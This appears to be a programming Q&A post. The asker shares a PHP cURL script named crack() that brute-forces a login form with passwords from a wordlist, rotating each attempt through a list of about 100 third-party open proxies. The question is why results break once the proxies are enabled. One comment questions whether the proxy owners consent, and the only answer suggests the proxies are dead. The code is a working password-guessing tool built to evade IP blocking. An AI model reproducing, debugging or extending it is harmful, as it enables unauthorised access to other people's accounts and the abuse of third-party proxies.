# Trouble with PHP cURL proxy and post

Tags: php, curl, curl-multi

I'm making a script that can check if accounts are still valid and working. I'm using this function :

```
function crack()
{
    $url = 'http://127.0.0.1/trying.php';
    $agent= 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0';
    $flag = 0;
    $fileh_proxy = fopen('proxylist.txt','r');
    $fileh_word = fopen('wordlist.txt','r');
    $i=0;
    while($pass = fgets($fileh_word))
    {
    $arrpass[$i] = $pass;
  if(strstr($pass,"\n"))
  {
    $pass = substr($pass, 0, strlen($pass)-2);
  }
    if(!($proxy = fgets($fileh_proxy)))
    {
        rewind($fileh_proxy);
    }
  if(strstr($proxy,"\n"))
  {
    $proxy = substr($proxy, 0, strlen($proxy)-2);
  }
    $post = "username=user&password=".$pass;
  $ch[$i] = curl_init($url);
  curl_setopt($ch[$i], CURLOPT_SSL_VERIFYPEER, false);
  curl_setopt($ch[$i], CURLOPT_FOLLOWLOCATION, true);
  curl_setopt($ch[$i], CURLOPT_PROXY, $proxy);//this is the part thats troubling me
  curl_setopt($ch[$i], CURLOPT_VERBOSE, true);
  curl_setopt($ch[$i], CURLOPT_REFERER, $url);
  curl_setopt($ch[$i], CURLOPT_POST, true);
  curl_setopt($ch[$i], CURLOPT_POSTFIELDS, $post);
  curl_setopt($ch[$i], CURLOPT_RETURNTRANSFER, true);
  curl_setopt($ch[$i], CURLOPT_USERAGENT, $agent);
  curl_setopt($ch[$i], CURLOPT_HEADER, 1);
    $i++;
    }
    $numberof = $i;
    $mh = curl_multi_init();
    for($i=0 ; $i < $numberof ; $i++)
    {
  curl_multi_add_handle($mh,$ch[$i]);
    }
    $running = NULL;
    do
    {
  curl_multi_exec($mh,$running);
    }while($running);
    for($i = 0 ; $i < $numberof ; $i++)
    {
  if(!strstr(curl_multi_getcontent($ch[$i]),'invalid') && 
           !strstr(curl_multi_getcontent($ch[$i]),'error') &&
           !strstr(curl_multi_getcontent($ch[$i]),'wrong')) 
  {  
    $flag = 1;
    echo '<br /><span style="color: red;">'.$arrpass[$i].'</span> MIGHT BE A VALID PASSWORD.<br />';
  }
  curl_multi_remove_handle($mh,$ch[$i]);
  curl_close($ch[$i]);   
    }
    curl_multi_close($mh);
    if($flag == 0)
    {
  echo 'Password could <span style="color: #F00;">NOT</span> be cracked';
    }
    fclose($fileh_proxy);
    fclose($fileh_word);
}
```

Here's trying.php :

```
<?php  
if(isset($_POST['username'],$_POST['password']))
{
    $us= $_POST['username'];
    $pass= $_POST['password'];
}
if($us=='user' && $pass=='mnop')
{
    echo 'hello';
}
else
{
    echo 'error, invalid, wrong';
}
?>
```

The problem is, when I do this to the crack function, its working perfectly :

```
//curl_setopt($ch[$i], CURLOPT_PROXY, $proxy);
```

The result for this ^^^ is :

> mnop MIGHT BE A VALID PASSWORD

But, as soon as I remove the // from that part and uncomment it :

> curl_setopt($ch[$i], CURLOPT_PROXY, $proxy);

Everything's going wrong and this is what is the result :

```
abcd MIGHT BE A VALID PASSWORD 
efgh MIGHT BE A VALID PASSWORD
ijkl MIGHT BE A VALID PASSWORD
mnop MIGHT BE A VALID PASSWORD
qrst MIGHT BE A VALID PASSWORD
uvwx MIGHT BE A VALID PASSWORD
yzab MIGHT BE A VALID PASSWORD
```

Here's wordlist.txt :

```
abcd
efgh
ijkl
mnop
qrst
uvwx
yzab
```

Here's proxylist.txt :

```
190.2.233.13:3128
200.54.92.187:3128
201.219.3.119:3128
175.136.192.5:8080
200.182.190.156:8080
175.136.246.105:8080
200.253.116.5:3128
31.47.250.238:3128
202.43.113.21:8888
81.213.157.71:80
168.226.35.19:8080
94.23.87.243:3128
217.196.164.61:3128
190.96.64.234:8080
200.114.103.33:8080
200.208.251.210:8080
119.235.16.41:8080
84.41.108.74:8080
80.90.12.36:8080
200.5.113.202:8080
200.182.190.157:8080
85.234.22.126:3128
200.208.251.213:8080
196.1.178.254:3128
116.90.208.47:8080
49.212.129.130:3128
190.82.89.154:3128
60.2.227.123:3128
119.82.239.50:8080
200.166.194.136:3128
114.32.95.96:8080
200.208.251.218:8080
200.42.56.146:8080
78.134.255.42:8080
187.0.222.167:3128
61.185.143.178:8080
200.182.190.149:8080
84.20.82.82:8080
183.63.145.116:3128
201.20.189.201:8080
200.27.114.233:8080
200.54.92.187:80
180.243.92.86:8080
203.114.112.101:3128
213.140.115.173:8080
218.92.252.25:8080
220.248.237.234:8080
213.131.41.98:8080
202.149.78.234:8080
200.166.194.135:3128
37.59.236.42:3128
221.6.15.156:82
212.113.47.87:3128
110.139.116.63:8080
201.12.116.18:80
219.130.39.9:3128
95.215.48.146:8080
89.251.103.130:8080
192.162.150.77:8080
186.236.129.11:3128
187.72.224.65:3128
41.32.43.243:8080
59.172.208.190:8080
168.226.35.19:80
119.97.146.148:80
190.41.70.37:8001
82.114.92.33:8080
186.237.23.160:8080
59.172.208.189:8080
121.52.144.245:8080
118.96.127.10:3128
190.121.135.178:8080
59.46.67.108:8080
202.137.21.196:8080
200.114.103.89:8080
61.167.49.188:8080
221.7.145.42:8080
82.200.165.46:3128
175.106.15.12:8181
119.6.72.133:3128
201.12.116.18:8080
222.89.154.10:9000
200.208.251.212:8080
202.159.95.220:8080
190.66.22.53:8080
201.144.252.115:3128
186.219.25.227:3128
80.250.35.180:8080
202.28.143.25:8080
72.64.146.136:43
123.108.14.39:8080
118.97.37.123:80
190.111.17.161:8080
119.252.160.34:8080
89.45.128.1:8080
110.138.245.95:3128
200.182.190.152:8080
119.187.148.34:8000
124.129.30.74:8080
119.252.168.34:8080
```

Please could someone help me??? I've tried real hard for this and it took a long time to make the whole code.

Comment: are you sure all those hosts condone of the cracking of their proxies?

Comment: Just like how we put proxy on our browsers to view webpages, I'm trying to connect to the proxies on proxylist.txt and send post requests to the file trying.php and then, view the contents of the page trying.php....

Answer (score 0):

brother i am new in curl work last 2-3 month on curl  your code seemed right i tested your proxies here http://www.checker.freeproxy.ru/checker/ most proxies are not working may be your code have issue  of dead proxies